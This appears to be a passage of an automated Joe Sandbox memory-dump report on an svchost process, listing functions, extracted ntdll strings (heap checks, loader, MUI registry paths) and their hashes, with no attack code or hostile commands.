Opcode ID: 31a87270b27f052d7de45e0e2e04fcd1a366ff0ba2c6a8f3938eae7d4a54ae68
Instruction ID: 5c708a20d7dd229fb92db42a0962ddf23fa10d616197322428cd23f8b8a9ce15
Opcode Fuzzy Hash: 31a87270b27f052d7de45e0e2e04fcd1a366ff0ba2c6a8f3938eae7d4a54ae68
Instruction Fuzzy Hash: E08101B2D122186F8B25FB98EDC5EEEB7BDAB15614B044572B910FB114E770ED048BA0

Function 03B68620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 03BA540A, 03BA5496, 03BA5519
Thread is in a state in which it cannot own a critical section, xrefs: 03BA5543
Address of the debug info found in the active list., xrefs: 03BA54AE, 03BA54FA
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 03BA54E2
Critical section address., xrefs: 03BA5502
Critical section address, xrefs: 03BA5425, 03BA54BC, 03BA5534
Critical section debug info address, xrefs: 03BA541F, 03BA552E
Thread identifier, xrefs: 03BA553A
Invalid debug info address of this critical section, xrefs: 03BA54B6
undeleted critical section in freed memory, xrefs: 03BA542B
8, xrefs: 03BA52E3
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 03BA54CE
corrupted critical section, xrefs: 03BA54C2
double initialized or corrupted critical section, xrefs: 03BA5508

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: 628687957c29558694ed17aa2393f6e0aef91a9b54719d1ec9a1a2d5f830a560
Instruction ID: b039365faca440efeac189cb215fa2d4cda356003bd3d60d8838e86bd836354e
Opcode Fuzzy Hash: 628687957c29558694ed17aa2393f6e0aef91a9b54719d1ec9a1a2d5f830a560
Instruction Fuzzy Hash: 4981B470A00758EFDB20CF98D841BAEBBB5FB45708F5441AAF518FB251D775AA40CB60

Function 03B60F30 Relevance: 13.3, Strings: 10, Instructions: 764COMMON

Download Yara Rule

Strings

l, xrefs: 03B60FC4
%, xrefs: 03B60F7E
!, xrefs: 03B60FA6
, xrefs: 03B60FEC
h, xrefs: 03B60FB0
0, xrefs: 03B60F92
9, xrefs: 03B60F9C
w, xrefs: 03B60FBA
%%%u, xrefs: 03BA14CC
%%%u!%s!, xrefs: 03BA14A1

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
API String ID: 0-360209818
Opcode ID: 1c0548c202060d31651ae2dea476d6fcb2a04f5c2a89f6f25375c946ca8abfd7
Instruction ID: 0e2be9d5f3147c3e701514e90ee9a3b446da7a99551cb5b8f06cff11d9ada112
Opcode Fuzzy Hash: 1c0548c202060d31651ae2dea476d6fcb2a04f5c2a89f6f25375c946ca8abfd7
Instruction Fuzzy Hash: FC62A0B5E04A298FDB64CF1CC8417A9B7B6FF85318F5882EAD449AB240D7365AD1CF40

Function 03BE12ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON

Download Yara Rule

Strings

Heap entry %p has incorrect PreviousSize field (%04x instead of %04x), xrefs: 03BE186B
Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x), xrefs: 03BE18F8
HEAP[%wZ]: , xrefs: 03BE16CD, 03BE16F9, 03BE1749, 03BE179B, 03BE17FC, 03BE1840, 03BE18D9
Heap block at %p is not last block in segment (%p), xrefs: 03BE17B7
Heap block at %p has incorrect segment offset (%x), xrefs: 03BE181A
Free Heap block %p modified at %p after it was freed, xrefs: 03BE171B
Heap block at %p has corrupted PreviousSize (%lx), xrefs: 03BE176D
Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x), xrefs: 03BE18A5
HEAP: , xrefs: 03BE1706, 03BE1756, 03BE17A8, 03BE1809, 03BE184D, 03BE1895, 03BE18E6

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
API String ID: 0-3591852110
Opcode ID: 0278a8eff2853692af35919d73fe0d34cc6d0ea1fc37d89417ae310a2987888c
Instruction ID: df8ef214af0bffc13d75945985a5767df760aafa95c28ae3d7f4e5c1f751b9f2
Opcode Fuzzy Hash: 0278a8eff2853692af35919d73fe0d34cc6d0ea1fc37d89417ae310a2987888c
Instruction Fuzzy Hash: 8B12AB74604641AFD725CF2CC441BBABBF5FF09708F2885E9E49A8B691D738E880DB50

Function 03B4AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON

Download Yara Rule

Strings

DLL name: %wZ, xrefs: 03B98075
LdrGetDllHandleEx, xrefs: 03B9807C, 03B983B2
Status: 0x%08lx, xrefs: 03B982D0, 03B983AB
LdrpInitializeDllPath, xrefs: 03B980AD
minkernel\ntdll\ldrfind.c, xrefs: 03B982E1
minkernel\ntdll\ldrutil.c, xrefs: 03B980B7
LdrpFindLoadedDllInternal, xrefs: 03B982D7
DLL search path passed in externally: %ws, xrefs: 03B980A6
minkernel\ntdll\ldrapi.c, xrefs: 03B98086, 03B983BC

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
API String ID: 0-3197712848
Opcode ID: 80523144ea686369a8d6ee6767b6f98e96ab766644c09a92c8747a8aecd06fac
Instruction ID: 8cbd99309fe4595ae76f451de458f06cb45c9aaa8bec9d420bd3bb9c60c400c4
Opcode Fuzzy Hash: 80523144ea686369a8d6ee6767b6f98e96ab766644c09a92c8747a8aecd06fac
Instruction Fuzzy Hash: FB12DF71A083558BD724DF28C440BAAB7E4FF8570CF0809BAF985CB291EB74D944DB96

Function 03B2D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON

Download Yara Rule

Strings

@, xrefs: 03B2D3E9
PreferredUILanguagesPending, xrefs: 03B8A8DE
Control Panel\Desktop\MuiCached, xrefs: 03B2D62B
@, xrefs: 03B2D49D
MachinePreferredUILanguages, xrefs: 03B2D685
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 03B2D3B6
PreferredUILanguages, xrefs: 03B2D4B8, 03B2D4C5
@, xrefs: 03B2D663
Control Panel\Desktop, xrefs: 03B2D45D

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
API String ID: 0-3532704233
Opcode ID: b950314dcae319a016ec353f022f9c5e741a4e428f3518886290865da822c2fc
Instruction ID: 8bec8c5c7b74debbda359b9aac7e4aa092f70f8728b01fa6cd6be40cc059a4f3
Opcode Fuzzy Hash: b950314dcae319a016ec353f022f9c5e741a4e428f3518886290865da822c2fc
Instruction Fuzzy Hash: 9BB18C725083619FC721EF24C440B6BBBE8EB84758F054ABEF8A9DB240D770D945CB92

Function 03BE0CB5 Relevance: 10.4, Strings: 8, Instructions: 402COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 03BE0E54, 03BE0EB5, 03BE0FC8, 03BE1051, 03BE1117, 03BE116B
Pseudo Tag %04x size incorrect (%Ix != %Ix) %p, xrefs: 03BE113D
dedicated (%04Ix) free list element %p is marked busy, xrefs: 03BE0ED1
Non-Dedicated free list element %p is out of order, xrefs: 03BE0E6D
Total size of free blocks in arena (%Id) does not match number total in heap header (%Id), xrefs: 03BE106F
Tag %04x (%ws) size incorrect (%Ix != %Ix) %p, xrefs: 03BE1192
Number of free blocks in arena (%ld) does not match number in the free lists (%ld), xrefs: 03BE0FE4
HEAP: , xrefs: 03BE0E61, 03BE0EC2, 03BE0FD5, 03BE105E, 03BE1124, 03BE1178

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
API String ID: 0-1357697941
Opcode ID: b6ff42e5fd92557154d1c4e0664e1d50b23221db3ccdf2954e1393a1782a96f5
Instruction ID: 60c080259fa0401ee06547fdf5d6674290f1204c50e252b418978c977caf1ab0
Opcode Fuzzy Hash: b6ff42e5fd92557154d1c4e0664e1d50b23221db3ccdf2954e1393a1782a96f5
Instruction Fuzzy Hash: D4F1CD35A04255EFCB25DF6EC440BAAFBF5FF09708F0880B9E4859B652C774A945CB90

Function 03BC9179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON

Download Yara Rule

Strings

BaseNamedObjects, xrefs: 03BC9477, 03BC947C
AppContainerNamedObjects, xrefs: 03BC946E, 03BC94D6
\Sessions, xrefs: 03BC9488
%s\%u-%u-%u-%u, xrefs: 03BC9422
\AppContainerNamedObjects, xrefs: 03BC94AB, 03BC94B9
%s\%ld\%s, xrefs: 03BC948D
\BaseNamedObjects, xrefs: 03BC949E
Global\Session\%ld%s, xrefs: 03BC94C5

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
API String ID: 0-3063724069
Opcode ID: 8fa5d623424304cc352dcaa7965875021da7f6e2583768de9f782b0af6409a78
Instruction ID: 4b0a216ae4ba08a85d2e99dc8b9dfa80b60098e2fcec3b718ebcd3ec01647c55
Opcode Fuzzy Hash: 8fa5d623424304cc352dcaa7965875021da7f6e2583768de9f782b0af6409a78
Instruction Fuzzy Hash: 03D1C172818395AFEB31DE64C841BABB7E8EF8471CF4449BDFA949B150D770C9048B92

Function 03BE0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

About to reallocate block at %p to %Ix bytes, xrefs: 03BE03BA
HEAP[%wZ]: , xrefs: 03BE0399, 03BE04A8, 03BE05D0, 03BE0675, 03BE06CC
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 03BE04D3
RtlReAllocateHeap, xrefs: 03BE02BF, 03BE0362
Just reallocated block at %p to %Ix bytes, xrefs: 03BE05F1
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 03BE069F
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 03BE06EA
HEAP: , xrefs: 03BE03A6, 03BE04B5, 03BE05DD, 03BE0682, 03BE06D9

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: 57dc45a660a487ef464f7af2756b94a27982ff96340423e1a676ad5d9d829ce2
Instruction ID: e9ea4efd5451ef9f79f040cb0b83f653eb085115f07d9da874ba8af9194c456c
Opcode Fuzzy Hash: 57dc45a660a487ef464f7af2756b94a27982ff96340423e1a676ad5d9d829ce2
Instruction Fuzzy Hash: CDD1DE35500785DFCB26EF6AC440AADFBF1FF4A708F0881E9E4599B662C7B89941CB10

Function 03B2D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON

Download Yara Rule

Strings

Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 03B2D262
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 03B2D2C3
Control Panel\Desktop\LanguageConfiguration, xrefs: 03B2D196
@, xrefs: 03B2D313
@, xrefs: 03B2D0FD
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 03B2D0CF
@, xrefs: 03B2D2AF
Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 03B2D146

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
API String ID: 0-1356375266
Opcode ID: 6722850cfec7b14b587430b0d5695405d79bf81dd9d069a138842634da2aabed
Instruction ID: 5ba5a00959c34da24125fe72fdc0a1f0f82d9ce1bdb0cb90ca038c6ecb8770d5
Opcode Fuzzy Hash: 6722850cfec7b14b587430b0d5695405d79bf81dd9d069a138842634da2aabed
Instruction Fuzzy Hash: CDA159759083559FD721DF24C484B5BBBE8FB84719F004EBEE5A89A240E774D908CB93

Function 03B49EB0 Relevance: 9.2, Strings: 7, Instructions: 499COMMON

Download Yara Rule

Strings

Internal error check failed, xrefs: 03B97718, 03B978A9
!(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 03B97709
sxsisol_SearchActCtxForDllName, xrefs: 03B976DD
Status != STATUS_NOT_FOUND, xrefs: 03B9789A
minkernel\ntdll\sxsisol.cpp, xrefs: 03B97713, 03B978A4
@, xrefs: 03B49EE7
[%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 03B976EE

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
API String ID: 0-761764676
Opcode ID: 0dad2f7dcdc6657b078cb9e1649004e1fd5c8cc50c3860f83800f25760e7ee4e
Instruction ID: 70aa4671e6609de5bd1417e06f127b8634891968cdffbc071e1472cbebe8a45b
Opcode Fuzzy Hash: 0dad2f7dcdc6657b078cb9e1649004e1fd5c8cc50c3860f83800f25760e7ee4e
Instruction Fuzzy Hash: F0127F749002159FDF24CF68C881AAEB7F4FF48718F1880FAE845EB251E734A851DB65

Function 03B3EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON

Download Yara Rule

Strings

LdrpResSearchResourceInsideDirectory Enter, xrefs: 03B3EB58
R, xrefs: 03B3EB62
, xrefs: 03B3F299
T, xrefs: 03B3EB4E
LdrpResSearchResourceInsideDirectory Exit, xrefs: 03B3EB6C
{, xrefs: 03B94643

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
API String ID: 0-1109411897
Opcode ID: 71bd5b455930b0685af5e8b91f57286f6e038d7dbe676e91865ab8ba93572fb0
Instruction ID: a8d1bde3efc71d757aef406c07a21d989204762f8b0aa6abfc9a48fdb80caf27
Opcode Fuzzy Hash: 71bd5b455930b0685af5e8b91f57286f6e038d7dbe676e91865ab8ba93572fb0
Instruction Fuzzy Hash: 22A21875E056298BDF64DF19C8987A9B7B5EF8A308F1442FAD80DA7250DB349E85CF00

Function 03B2F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON

Download Yara Rule

Strings

(UCRBlock != NULL), xrefs: 03B8DF6F
HEAP[%wZ]: , xrefs: 03B8DF57, 03B8E09B, 03B8E279, 03B8E391
(LONG)FreeEntry->Size > 1, xrefs: 03B8E291
((LONG)FreeEntry->Size > 1), xrefs: 03B8E0B3
(!TrailingUCR), xrefs: 03B8E3A9
HEAP: , xrefs: 03B8DF64, 03B8E0A8, 03B8E286, 03B8E39E

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: fa8503d7341bb030d12bf8375059003fd1a53f9e555a43da729fb218beb02dc6
Instruction ID: e919496d26f46be7e8ec3539e0a6158ecf80b4fd119a9e8ef6b451fc0928fbf6
Opcode Fuzzy Hash: fa8503d7341bb030d12bf8375059003fd1a53f9e555a43da729fb218beb02dc6
Instruction Fuzzy Hash: 4842ED356083919FC715EF28C484B2AFBE5FF89608F084AFDE4998B291DB34D945CB52

Function 03B3ADE0 Relevance: 8.1, Strings: 6, Instructions: 573COMMON

Download Yara Rule

Strings

H, xrefs: 03B3AEC2
LdrpResSearchResourceMappedFile Exit, xrefs: 03B3AECC
#, xrefs: 03B9363D
J, xrefs: 03B3AEAE
MUI, xrefs: 03B3B410
LdrpResSearchResourceMappedFile Enter, xrefs: 03B3AEB8

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
API String ID: 0-4098886588
Opcode ID: af6f025b8e4a2eb37ade80e9ec88c2d0688b3cf3bd80cecb4dfd3a9a11b22597
Instruction ID: bec34b2e06520565f13bc9c284e2fa19ca68b3c579e4fdbfd8f0fe52e2e8358d
Opcode Fuzzy Hash: af6f025b8e4a2eb37ade80e9ec88c2d0688b3cf3bd80cecb4dfd3a9a11b22597
Instruction Fuzzy Hash: BA327D75E042798BEF21CB14C894BEEB7B9EF46348F1841FAE449A7254DB719E818F40

Function 03B4B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON

Download Yara Rule

Strings

SxS, xrefs: 03B983ED
DLL %wZ was redirected to %wZ by %s, xrefs: 03B983FC
API set, xrefs: 03B983F4, 03B983F9
minkernel\ntdll\ldrutil.c, xrefs: 03B9840D, 03B984E1
LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx, xrefs: 03B984D0
LdrpPreprocessDllName, xrefs: 03B98403, 03B984D7

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
API String ID: 0-122214566
Opcode ID: 1b1a92f1bd686ae839efc7cd51c57b9b232396663b5a7e1a0de76119fcfae009
Instruction ID: 63712201166c15e52a1752bb872c736826f7177cfa4256588ad82393ad906665
Opcode Fuzzy Hash: 1b1a92f1bd686ae839efc7cd51c57b9b232396663b5a7e1a0de76119fcfae009
Instruction Fuzzy Hash: CDC14A31A00215ABDF24CB69C881B7EBB65EF8570CF1840F9EA85DF291E7B4D944E394

Function 03B663FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

Process initialization failed with status 0x%08lx, xrefs: 03BA413A
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 03BA41FE
minkernel\ntdll\ldrinit.c, xrefs: 03BA40E9, 03BA414B, 03BA420F, 03BA4269
Delaying execution failed with status 0x%08lx, xrefs: 03BA4258
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 03BA40D8
_LdrpInitialize, xrefs: 03BA40DF, 03BA4141, 03BA4205, 03BA425F

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 61bbf8b0ba8750886e8142770006309c8ef7814d3844f2dd7a0c3f3ccc2b68ed
Instruction ID: 5a4497c4fe3b78dd0d6b41f400dc00d62e4e5a76e934c6b57521b1a53cf001b9
Opcode Fuzzy Hash: 61bbf8b0ba8750886e8142770006309c8ef7814d3844f2dd7a0c3f3ccc2b68ed
Instruction Fuzzy Hash: 21913834A14B549BDB34EF19D945BAEBBA4EB81B1CF1401F9E810AF382D7B89C01C790

Function 03B6C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

Loading import redirection DLL: '%wZ', xrefs: 03BA8170
LdrpInitializeImportRedirection, xrefs: 03BA8177, 03BA81EB
minkernel\ntdll\ldrinit.c, xrefs: 03B6C6C3
LdrpInitializeProcess, xrefs: 03B6C6C4
minkernel\ntdll\ldrredirect.c, xrefs: 03BA8181, 03BA81F5
Unable to build import redirection Table, Status = 0x%x, xrefs: 03BA81E5

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: 87569fed0225cd0e3c9de816c4f24a6c842b432a35eae1896cbe5326c96fc53e
Instruction ID: 3efba3f018186e416e56c273d2d7681be7b84a5cde8415b1a2f687184acd3a38
Opcode Fuzzy Hash: 87569fed0225cd0e3c9de816c4f24a6c842b432a35eae1896cbe5326c96fc53e
Instruction Fuzzy Hash: A73119757457459FC210EF28DD45E2ABBE4EF84B18F0405F8F8859F291E660ED04C7A2

Function 03BB9C32 Relevance: 6.8, Strings: 5, Instructions: 542COMMON

Download Yara Rule

Strings

@, xrefs: 03BB9E80
\KnownDlls32, xrefs: 03BB9C67
L, xrefs: 03BBA2FB
AVRF: Verifier .dlls must not have thread locals, xrefs: 03BBA12D
KnownDllPath, xrefs: 03BB9CF9

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: @$AVRF: Verifier .dlls must not have thread locals$KnownDllPath$L$\KnownDlls32
API String ID: 0-3127649145
Opcode ID: 97343b7104d56f69e6e36600edf55313259d678decc978d0a10a5d29efae0116
Instruction ID: 0ace595636fdab78fdf0f680ec05c5ab458d570859a0237f6ea13ba296bc8e0d
Opcode Fuzzy Hash: 97343b7104d56f69e6e36600edf55313259d678decc978d0a10a5d29efae0116
Instruction Fuzzy Hash: 44322A75A017199BDB61DF65CC88BEAB7F8FF44308F1045EAD509AB250DBB0AA84CF50

Function 03B49950 Relevance: 6.7, Strings: 5, Instructions: 462COMMON

Download Yara Rule

Strings

, xrefs: 03B499F9
, xrefs: 03B499F1
Internal error check failed, xrefs: 03B976B2
Status != STATUS_SXS_SECTION_NOT_FOUND, xrefs: 03B976A3
minkernel\ntdll\sxsisol.cpp, xrefs: 03B976AD

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
API String ID: 0-3393094623
Opcode ID: da0579b2a2ae90ebe0f3454009dc35bb3b83b70d896bd7f0ec83a923db9b55ee
Instruction ID: efcef19b02bbe75d836219a8723a5cf5b62fb0ff056e86b4acd5b5de0b876785
Opcode Fuzzy Hash: da0579b2a2ae90ebe0f3454009dc35bb3b83b70d896bd7f0ec83a923db9b55ee
Instruction Fuzzy Hash: D3024971508341CBDB20CF64C084B6BBBE5EF89748F4889BEE9998B251E770D844DB96

Function 03B551EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON

Download Yara Rule

Strings

Kernel-MUI-Language-SKU, xrefs: 03B5542B
WindowsExcludedProcs, xrefs: 03B5522A
Kernel-MUI-Language-Allowed, xrefs: 03B5527B
Kernel-MUI-Number-Allowed, xrefs: 03B55247
Kernel-MUI-Language-Disallowed, xrefs: 03B55352

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 7ae12949e0f07a686a5e33b803f80359022571162f9e21187543cf64090ae05f
Instruction ID: 03830339665f6707daffe79bb6d7fd3498aaa2e65a2719d566c33a348da949ca
Opcode Fuzzy Hash: 7ae12949e0f07a686a5e33b803f80359022571162f9e21187543cf64090ae05f
Instruction Fuzzy Hash: 5EF13076D00218EFCF25DF94D980A9EBBF9EF49654F1540BBE906AB250D7709E01CB90

Function 03BB4F40 Relevance: 6.5, Strings: 5, Instructions: 246COMMON

Download Yara Rule

Strings

.Local, xrefs: 03BB5170
\microsoft.system.package.metadata\Application, xrefs: 03BB5158
.DLL, xrefs: 03BB50C7, 03BB519C
\, xrefs: 03BB4F66
/, xrefs: 03BB4F6D

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
API String ID: 0-2518169356
Opcode ID: 105c59d8b1fba4f5bb62d25ee4f73083fd40055adccbb35d82adb2723a4352af
Instruction ID: 3a1a26ab6e4e142c60fad1bea6532022484836d0e34709d8b5db22fecc8288f1
